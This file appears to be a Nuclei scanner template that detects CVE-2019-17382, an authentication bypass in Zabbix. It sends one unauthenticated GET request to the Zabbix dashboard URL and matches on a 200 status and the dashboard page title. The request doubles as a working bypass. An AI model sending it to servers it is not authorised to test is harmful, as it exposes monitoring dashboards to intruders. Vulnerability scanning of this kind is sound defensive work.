nuclei-templates/cves/CVE-2019-17382.yaml

22 lines
443 B
YAML

id: cve-2019-17382
info:
name: Zabbix Authentication Bypass
author: Harsh Bothra
severity: critical
# source:- https://nvd.nist.gov/vuln/detail/CVE-2019-17382
requests:
- method: GET
path:
- '{{BaseURL}}/zabbix.php?action=dashboard.view&dashboardid=1'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<title>Dashboard</title>"